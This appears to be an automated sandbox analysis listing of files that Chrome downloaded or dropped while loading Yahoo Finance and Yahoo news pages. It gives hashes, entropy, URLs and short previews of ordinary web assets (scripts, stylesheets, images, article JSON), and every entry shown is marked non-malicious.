                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):178398
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.7952488932049295
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3072:T2HdALSWdG78KI4NBT0pfXle5jWlYoRl96678fGoU67Clq:qHdALSAG78KI4NBT0L4jWlYoL9N78fGe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4B67750FA9444F8FBB20D64CDF9704B9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C4FE1141A0B55AE3E19DDD66C889784CF25A785D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:47A75420F65769B2864A979F5FAF9BAD6FC85B5FEF0EADB17BEC05E5B7212113
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:50CA317E3DEFE8C96C834834E47591CA546A862662929AFCABE460157F993C1980783AA62B6CFD7601A0686ED76730E04C4C58FE4D2D304EADA3D81842C68000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/aaq/f10d509c/d1ccw66oyq8ex2.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:(new function(){var c=['vvDq','AgfZqMvLBKfJDgL2zq==','Ahr0Cc1LCxvPDG==','DMfSDwu=','CMjVEa==','CgjQCW==','rNvUy3rPB24=','C2HPzNq=','yxeTEwHI','CMvWBgfJzunOAwXKCMvU','C2fMzuzYyw1L','zgLZCgXHEq==','qvvesu8=','y29Uy2f0','vezg','w0vsuL9nx0Lewf0=','qurg','v0felq==','q1jjtG==','B25fDMvUDa==','D2LUzg93lNbHCMvUDfSI','Bg9JywXtDg9YywDL','DhLWzq==','cIaGicbHDcbHyM91DdPZCMnKB2m6','ANn0EM9MzNnLDa==','qMXVy2TLza==','x2uSigv2ywWO','zg9JDw1LBNrfBgvTzw50','Aw1Nw2fSDf0=','y2LVx2jKmG==','q09j','r0fe','CgXHEq==','tKfm','lMrVy3vTzw50la==','sfrntfnJCMLWDevSzw1LBNq=','DgLTzxvWzgf0zq==','C3rHy2S6ia==','BgfUz3vHz2vZ','zMXVB3i=','Dg9Wtg9JyxrPB24=','yxvJDgLVBKvUza==','y29SlxbIyNm=','ywr1CMW9','zxH0lxDHza==','Aw1W','x19JB25ZB2XLlMeK','CMvSB2fK','C3rVCeLTBwvKAwf0zvbYB3bHz2f0Aw9U','qveTwuG=','zNjHBwvZ','Dw5ZAgLMDa==','w0vsuL9exq==','yMvMB3jLqMLKzgvYshr0Ca==','sw50zxjUywXfCNjVCG==','su5qvvq=','zgf0ys1LBMmTC2nYAxb0','Aw1WBgvTzw50yxrPB24=','yxbPu3PTrNjvBNDYCa==','C3jJlMnVBNrLBNq=','zgvZDgLUyxrPB24=','yMLKv29U','ywrT',
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (2288)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2289
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.9695026854614825
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:LBP5KB5PRzAJfJhHVHi0f8oHXQuV6aJnevLkIHH4H7HOP:J5Kp8JRoAhd2T
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4629D170EC95CCD03C1E4A97C8E1644B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9CCB04CEC88A5D8A0E33FC505E4058DFDA956836
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:4EA0FB5DD11C18ED4E8551EA73E9926602EB3959DE18FB0D47BA820E6C7A5DEF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:F60FC574C658E97B091A45B1BA6F6DC6560B8CF1C68FA6F9FC5BD4E85C02AC524A867FFA7551E8789E9A9BC53276B0B16080680F208F7E8C682F4D45E1E5213D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/Tabs.agUa80w0.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.tabList.yf-gfq5ju.yf-gfq5ju{display:inline-flex;align-items:baseline;border-radius:var(--border-radius-s);position:relative;scroll-snap-type:x mandatory;scroll-behavior:smooth;scrollbar-width:none}.tabList.l2.yf-gfq5ju.yf-gfq5ju{align-items:center}.tabList.yf-gfq5ju.yf-gfq5ju::-webkit-scrollbar{display:none}.tabList.yf-gfq5ju .tabBtn.yf-gfq5ju{--tab-color:var(--primary);--tab-transition-duration:.15s;display:flex;align-items:center;transition-property:color,border-color;transition-duration:var(--tab-transition-duration);transition-timing-function:ease-in-out;background-color:var(--tab-bg-color, transparent);border-radius:var(--border-radius-s);color:var(--tab-color);font-weight:var(--font-medium);font-size:var(--tab-size, var(--font-m));line-height:1.25;padding:0 var(--space-3);cursor:pointer;gap:var(--space-1);white-space:nowrap}.tabList.yf-gfq5ju .tabBtn.l1.yf-gfq5ju{--tab-size:var(--font-m);height:2rem}.tabList.yf-gfq5ju .tabBtn.l2.yf-gfq5ju{--tab-size:var(--font-s);height:1.5rem}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (11702)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):11703
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.955121604597076
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:C5S51JfKyyHQLEHDUvX1/MdXbVuEz0K4RCD76Rc2QKRG9+9KLlOtdveTfQoLYUOj:C5S51JCyyHQLEjUvX1/MdXbVuEz0K4g6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:C589CC24913FC4C78FB0088EC36137DD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:999B20F2A8D558D461B83AFFCF272D0E5DAAB456
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:5E8559E4A60187B7707F2E87BCAE405BF6022CA106C2E7862FC6A46B07FA3153
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:62E5D8A2673CFE61BC3FC569BF076F2C84DB78DBFEF9B773091E5BD933467A92F60DE7230EC866F58BEC4304DA5F323590C531E0D1533836EDA96280E49AFF47
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const c={js:"https://s.yimg.com/uc/finance/cosaic/js/finStatic.7f5cf182dfdebbcf95e5.js"},s={js:"https://s.yimg.com/uc/finance/cosaic/js/finMetric.8ecbb5dec206a2c22347.js",css:"https://s.yimg.com/uc/finance/cosaic/css/finMetric.5a67d1854c1cf4ce36ba.css"},a={js:"https://s.yimg.com/uc/finance/cosaic/js/html2canvas.7f6e290971e4b971194b.js"},i={js:"https://s.yimg.com/uc/finance/cosaic/js/chartiq.5652c847dc2982261b6c.js"},e={js:"https://s.yimg.com/uc/finance/cosaic/js/components.304a38d129675d470223.js"},f={"finChart-86a61ec1":{js:"https://s.yimg.com/uc/finance/cosaic/js/finChart-86a61ec1.4781812fa137df8d26a7.js"},"finQuote-3b430431":{js:"https://s.yimg.com/uc/finance/cosaic/js/finQuote-3b430431.6c6819de00e6258bcc5a.js"},finStatic:c,finMetric:s,html2canvas:a,"vendors-d5c1e108":{js:"https://s.yimg.com/uc/finance/cosaic/js/vendors-d5c1e108.4ca627e7d7b910db51e3.js"},chartiq:i,components:e,"common-7db6e8e4":{js:"https://s.yimg.com/uc/finance/cosaic/js/common-7db6e8e4.1529d1be95c4d4d658f3.js"},"f
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1087
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.120392827929451
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:tCbYLdLGSKGQlnGMGlTIqdhg1a4x0KKGSyFzWIS66AvIS6RAytgI:DJGSdQMH76k96gsK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:B182D19798F0D66CA701301E28C0034A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:52C014BAA654A9E6B73CAC335FEFDB7B39B6B123
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:804F7150640198DF0AAC95F7499EC183FFED8AB411CCF16C5D96D3D83A75E063
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:238044791F93191D6899F784C114A4DC4F610A55BCA1BCCB75CDCC9A2799617ECB63C49546623AB20474EDCF6A38642708093E03EA32C39E77A190970B06E750
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<svg width="48" height="48" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <defs>. <linearGradient x1="64.278%" y1="100%" x2="64.278%" y2="1.351%" id="a">. <stop stop-color="#B5BDC8" offset="0%"/>. <stop stop-color="#C7CDD2" offset="21.044%"/>. <stop stop-color="#E5EBEF" offset="100%"/>. </linearGradient>. <path d="M44 15.23c0 8.462-6.77 15.232-15.23 15.232H9.307C4.23 30.462 0 26.23 0 21.154s4.23-9.308 9.308-9.308c1.523 0 3.046.339 4.4 1.185C14.892 5.585 21.154 0 28.769 0 37.231 0 44 6.77 44 15.23z" id="b"/>. </defs>. <g fill="none" fill-rule="nonzero">. <g transform="translate(2 2)">. <use fill="url(#a)" xlink:href="#b"/>. <use fill-opacity=".05" fill="#7DCBFF" xlink:href="#b"/>. </g>. <path d="M35.914 42.972c-.612 2.255-2.858 3.485-4.9 2.87-2.244-.615-3.47-2.87-2.857-4.92C28.565 38.87 33.67 36 33.67 36s2.857 4.921 2.245 6.972zM21.914 42.972c-.612 2.255-2.858 3.485-4.9 2.87-2.244-.615-3.47-2.87-2.857-4.92C1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:gzip compressed data, was "with-all-vendors-bundle.js", last modified: Thu Jun 27 09:13:17 2024, from Unix, original size modulo 2^32 29158
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):8924
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.975898781741254
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:rIRpuvMe3ZmHZ93pElrqNBH0mylgB56IyxyplPD3hQHJ:ccMeoHf3piqNt0VYHyxGlPleJ
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:D174EB727D8B89876AEB77ABDA6A1037
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:593794AE78E3F060B639CDF63C087E4E7C017B22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:31153254B17DCE957C09B43A4FDC3CEB37E29D12590D66F6D9C6CF2A1F2BC12A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BD90A665CFBA98879E76CDA377479ABE15CB62AC2609C86B5CA0EA5F17D8D470E566DA4D3CE04E5421BC618661ED32DA347F46A7A672BF21A4442D2A9EAF58CF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:....--}f..with-all-vendors-bundle.js..\{s.8..*2.NG.iF.-?.0:O.;..*.L.V..E.....@...w...H..e;..6.D ......A.)...=.Y..?..2..4]%2ZN. .....=.....VY.......x...l.J.;..G+KY+.".Ik.<.e..........g.....|..'.I/d.O"Y1!.l.Z.)K.'a.3.}.....:.gx...p....9>:u..~..O.7.m........VB.-..+..[...TA.K+.-1..n.........3...e..V..v..qb.w....b.o.b....GZ./.|2......&f..X.....f..G..z..q-......w/"..9n3g....=...l.U.4s.....-.n...Hd.;.-...A'.mp....a.9%....R/. ..xB}.o...x)..0...9|L?. ..<d_&>.4./.,K....pT1IA..x........^...G.d.......+p.q.2l..|.X.L....290.o-`..H5...".x...k.(H..v.x...............f.Gj.B;.K.e~ nA..L..W........J...3Jq9.E:.....V....K...q..u.dW+...ez.H`....2..-R%.Ft.... .wQ....MJ.....)|i<.....D..%?y..#.Ig".a...Q..Dq$....~...m....2qN...,f...-..}."....}..!....(.>........O...}.o.>...w...5M......)..#=.&...\N.+..:;H..........8.R.=..r.......e....S........mg....E.Z.`.5.Y ...l ..n..Fg.R8.~.}:...._/.._|.....Q....$.x..x.D.k`..K.j.g...}T..>.ar.M.W.>^_..N...._..."..d..s....... #
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (3178)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):3179
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.349532496541393
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:OZ4kcoCIk7ZrPjmx8ctWiJ6T2AhO6dGeAN2VRVctTiL7KSRraHNy9I3BiOtnL/:OQIkVrPSYiW26O6dJAgVELgoiI3BiOd
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3A76B0476EC9890C130DF144192287A2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:9ACA527796516EDE2CD668736CD2182E9457BDF1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9697C163069993BD56B2456233E9A72DB225EBCBA3D0E102EFBD41939B55C9EE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:AFA2FB4EEDF5114B177E1DC83127BD8497FCE77C385CAFE3133E849E879C37009B653C11BCD50CAD3A894B57A0B92D295A6491E19BDFC63A710644E66F49A2A1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Typography.Bo-BwejA.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as E,p as C,k as L,i as b,_ as N,A as q,W as D,c as F,e as G,d as H,f as I,M as k,L as x,u as J,g as K,a as O}from"./scheduler.Dsuh-FKt.js";import{S as Q,i as R,t as P,a as U}from"./index.CvwOawEI.js";import{g as X}from"./spread.CgU5AtxT.js";var j=(e=>(e.heading="heading",e.body="body",e.ui="ui",e.section="section",e))(j||{}),d=(e=>(e.h1="h1",e.h2="h2",e.h3="h3",e.h4="h4",e.h5="h5",e.h6="h6",e.span="span",e.p="p",e.div="div",e.section="section",e.article="article",e.aside="aside",e.header="header",e.footer="footer",e.ul="ul",e.ol="ol",e.li="li",e.dl="dl",e.dt="dt",e.dd="dd",e.tr="tr",e.td="td",e.th="th",e.caption="caption",e.label="label",e))(d||{}),B=(e=>(e.xxxs="xxxs",e.xxs="xxs",e.xs="xs",e.sm="sm",e.md="md",e.lg="lg",e.xl="xl",e.xxl="xxl",e.xxxl="xxxl",e))(B||{}),M=(e=>(e.bold="bold",e.med="med",e.reg="reg",e))(M||{});const _={heading:["xxxs","xxs","xs","sm","md","lg","xl","xxl"],ui:["xs","sm","md","lg","xl","xxl"],body:["xs","sm","md","lg","xl"],section:["xs","sm","md","l
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (690)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):691
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.400056759061206
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:LTDrZD/T4XMRdE3pFhDImgB3URmNZRaDM7QV0I1aDlKX8CbzqQ+fHki:XfZDr4XMRdE5zgVUaRAVJaDlKXBnKvki
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6EA76FBFBD9BB96AACE1EEA54238290F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:F345A537E90BF55445D5329465474CDC771C5DE0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:6F94A8FB873243F4B38927C5986ADD75392CA219AF0603743EFFA8605A1EE3A5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:50F04A927EC5B2BFFF5A934668ED1B65A823FE2668020C28ED974D58357961E3F62059A0805D8645AA4EA16615CF3EDDD5F4982C318B369E57D62CA4E7D00191
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{_ as A}from"./preload-helper.D6kgxu3v.js";import{c as d}from"./commonUtil.BWwawKjd.js";async function _(n,{denyList:a}={}){const[c]=await d(["assets"],n);a=a||/(finChart.*|finStatic.*|finMetric.*|html2canvas|components)/;const i=[],o=[];await A(()=>import("./webpack-assets-prod.DkcX54ri.js"),[],import.meta.url).then(f=>{const r=f.default;for(const s in r)if(!a.test(s)&&r[s]&&s!==""){let{js:t,css:e}=r[s];t&&(t=Array.isArray(t)?t:[t],i.push(...t)),e&&(e=Array.isArray(e)?e:[e],o.push(...e))}c.addAsset({css:o,js:i.map(s=>({defer:!0,src:s}))})}).then(()=>{typeof window<"u"&&window.dispatchEvent(new CustomEvent("YFINCHART_SRC_LOAD",{detail:{event:"asset-load"}}))})}export{_ as l};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1058)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1059
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.1109409484305
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:DOd1kGZRWAWJq2qFeR0MANmvtssvujjSYWeYmL4Na2Gev:k1Vwj9Rc7s4jUeJ4NbGw
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:37ADF3441948B71BD7589823F7BCD0C5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:D99AA0426A06385C92F81D69030FA61CE9B2B966
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1B4C8ECE36EC68266F8B7EC948AEB5A1766CC29D444B47C328B95F89A2482F0F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:C91C9721CF49C72CFFDD7B745FC7328650F3111191A2115DA6CB03790ED6C1F9B5A2DAFDFB6B8A33B3CAE5C79CD7F6EACC7EF3FEFC9CE41A068FB0C41D796029
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/preload-helper.D6kgxu3v.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:const v="modulepreload",y=function(a,l){return new URL(a,l).href},d={},w=function(l,c,u){let f=Promise.resolve();if(c&&c.length>0){const r=document.getElementsByTagName("link"),e=document.querySelector("meta[property=csp-nonce]"),h=(e==null?void 0:e.nonce)||(e==null?void 0:e.getAttribute("nonce"));f=Promise.all(c.map(t=>{if(t=y(t,u),t in d)return;d[t]=!0;const s=t.endsWith(".css"),m=s?'[rel="stylesheet"]':"";if(!!u)for(let o=r.length-1;o>=0;o--){const i=r[o];if(i.href===t&&(!s||i.rel==="stylesheet"))return}else if(document.querySelector(`link[href="${t}"]${m}`))return;const n=document.createElement("link");if(n.rel=s?"stylesheet":v,s||(n.as="script",n.crossOrigin=""),n.href=t,h&&n.setAttribute("nonce",h),document.head.appendChild(n),s)return new Promise((o,i)=>{n.addEventListener("load",o),n.addEventListener("error",()=>i(new Error(`Unable to preload CSS for ${t}`)))})}))}return f.then(()=>l()).catch(r=>{const e=new Event("vite:preloadError",{cancelable:!0});if(e.payload=r,window.dispa
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (49215)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):49303
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.332003974067995
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:768:cs5YFNH3tY9Z4nTm0a/l/DYuXyozLdmg1z52eQOAbVAzxl6ytIwAFlt1aAvA8ie6:N4nTmT/D7JiA+1uuMhL
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:DE1AF2434303255EEC1B0DC77CB2AC5D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0D5DAB396BC33D293C22E92CD834BD02F45CE3CC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:548EB46A28694BF39B08C54D42C56513505F916A32F03BDB411DE124C6552BEB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:64C45496AC3692BF0628FA68C8A0D6091372C8CBCFAB3175045260C02B90505E8C02585E650224066B58C98BEED06EC81CCFCFAC3B1E99913F35BAC08A2C1421
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:/*! For license information please see streamer.248f993752a5b05fef83.mjs.LICENSE.txt */.(()=>{var e={1386:(e,t,r)=>{"use strict";r.r(t);var s=r(3379),i=r.n(s),n=r(9037),a=r.n(n),o=r(569),c=r.n(o),l=r(3565),u=r.n(l),h=r(9216),b=r.n(h),f=r(2566),d={};d.setAttributes=u(),d.insert=c().bind(null,"head"),d.domAPI=a(),d.insertStyleElement=b(),i()(f.Z,d);const m=f.Z&&f.Z.locals?f.Z.locals:void 0;var p=r(4149),g=r.n(p);function y(){return y=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var s in r)Object.prototype.hasOwnProperty.call(r,s)&&(e[s]=r[s])}return e},y.apply(this,arguments)}const v="streamer",w="txt",S="data-field",k="data-symbol",M="data-stream",P="data-value",T="value",C="active";class E extends HTMLElement{constructor(){var e,t,r,s;super(),e=this,r=({isIntersecting:e})=>{if(this.isIntersecting=e,e&&!this.subscribed){const e=this.getAttribute(S),t=this.getAttribute(k);this.value=parseFloat(this.getAttribute(P)||this.getAttr
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65522), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):1108458
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.816098319980892
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24576:BMVkvc+rJvDupj5zS1tKrsNKiWG2xYXbXMebfN:BMVkvc+rUj5zS1tKrsNKiWG2xYzMebfN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:60A48D1C1714C4E7F2C16EC70C1E7FE7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:87EAB5F223CEE7A69FBF6A4C43EF7BAEC023FBF0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:A60B1A772F1A70B5DA463149C56A978E74C861979DD564609BA519C102937C42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:E749BEEF72110416197DECD83FA9DFB953CE43A668BE78113AC3270E579882CD8BCFB35DE483ED9E6A0CAA6DC8C23436F2DD85A67BAD76708E3216723013A4BF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:"https://www.yahoo.com/caas/content/article/?uuid=60ff7c91-851e-44a7-8400-9dddc9a53744,6af55d48-c74c-4256-b3c7-d83c2f09aacb,5805266d-0392-4fc5-99e3-b3b7e9dcb8e1,d1fcf1c7-2c6e-42c3-872e-a19bb4e9cd08,18f2d39f-eda5-4e7b-ae1d-b679c4a66f1a,96cf70ac-87fb-47ef-be1c-255bf47b00c2&appid=news_web&device=desktop&lang=en-US&region=US&site=fp&partner=none&bucket=900,seamless&features=enableEVPlayer,enableOverrideSpaceId,contentFeedbackEnabled,enableAdFeedbackV2,enableInArticleAd,enableOpinionLabel,enableSingleSlotting,enableVideoDocking,outStream,showCommentsIconWithDynamicCount,enableStickyAds,showCommentsIconInShareSec,enableAdSlotsNewMap,enableGAMAds,enableGAMAdsOnLoad,enableFinancePremiumTicker,enableAdLiteUpSellFeedback,enableRRAtTop,enableCommentsCountInViewCommentsCta,enableRRAdsSlots,enableRRAdsSlotsWithJAC,newsModal,enableViewCommentsCTA&rid=1pa4ckpjflnfm"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:{"items":[{"data":{"partnerData":{"adMeta":{"hashtag":"news;nordstrom;shopping;shopping","isSupplySegment":"false","lang":"en-US","region":"US","rs":"lmsid:a0V0W00000JIbmMUAT;revsp:yahoo_life_shopping_281;lpstaid:60ff7c91-851e-44a7-8400-9dddc9a53744;pt:content;pd:modal;ver:megastrm;pct:story","site_attribute":"wiki_topics=\"Nordstrom;Gilmore_Girls;Charlotte_Tilbury\" ctopid=\"1878000;10610489\" hashtag=\"news;nordstrom;shopping;1878000;10610489\" rs=\"lmsid:a0V0W00000JIbmMUAT;revsp:yahoo_life_shopping_281;lpstaid:60ff7c91-851e-44a7-8400-9dddc9a53744;pt:content;pd:modal;ver:megastrm;lu:0;pct:story\"","spaceid":"1197792446","site":"lifestyle","enabled":true,"pos":"","showBodyAds":false,"showPhotoAds":false},"alias":"ymedia-alias:shadow=i-scrolled-through-18000-nordstrom-new-fall-arrivals--here-are-my-25-favorites-210216826","canonicalSite":"lifestyle","canonicalUrl":"https://www.yahoo.com/lifestyle/i-scrolled-through-18000-nordstrom-new-fall-arrivals--here-are-my-25-favorites-210216826.h
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (11269)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):11270
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.570460312881188
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:81LxhOR9lvNctbaZ7r02+oMcECny6ne117eaju4O2HwI6ze8X+QInuS6WyMP/1BU:81LxhOR9lw2+oM9DT117eyLBb8P/oiqm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:7082E09CBEB8CF39B0CE52DC40AA31C5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:467F22AA09E29638F679BAF00FC23892196CE2F4
